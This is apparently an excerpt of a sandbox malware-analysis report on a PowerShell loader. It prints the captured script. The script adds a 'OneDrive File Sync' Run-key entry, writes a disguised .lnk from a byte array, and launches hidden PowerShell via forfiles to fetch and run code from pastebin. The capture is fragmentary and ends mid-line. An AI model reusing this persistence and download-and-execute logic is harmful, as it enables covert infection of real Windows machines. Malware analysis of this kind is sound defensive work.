115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
